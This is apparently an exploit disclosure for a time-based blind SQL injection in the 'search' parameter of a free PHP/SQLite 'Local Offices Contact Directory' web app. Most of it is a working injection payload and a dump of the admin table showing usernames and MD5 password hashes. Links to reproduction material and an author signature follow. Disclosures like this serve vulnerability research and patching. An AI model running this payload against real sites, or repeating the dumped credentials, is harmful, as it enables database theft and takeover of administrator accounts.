https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html ## Vendor: [href](https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html) ## Description: The `search` parameter appears to be vulnerable to time-based blind SQL injection attacks, on the web app "Local Offices Contact Directories Site" (by oretnom23). The malicious attacker can execute a malicious payload and he can dump hashes authentication credentials. Then the attacker can to take control of the admin account of the system and can steal sensitive information and can destroy the system administrative account. ## Payload: ```sql --- Parameter: search (GET) Type: time-based blind Title: SQLite > 2.0 AND time-based blind (heavy query) Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245 AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||' --- ``` - dump ```sql Table: admin_list [2 entries] +----------+----------------------------------+ | username | password | +----------+----------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 | | cblake | cd74fae0a3adf459f73bbf187607ccea | +----------+----------------------------------+ ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/fool-CVE-nu11-100421) ## Proof: [href](https://streamable.com/zmm464) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://www.exploit-db.com/ https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty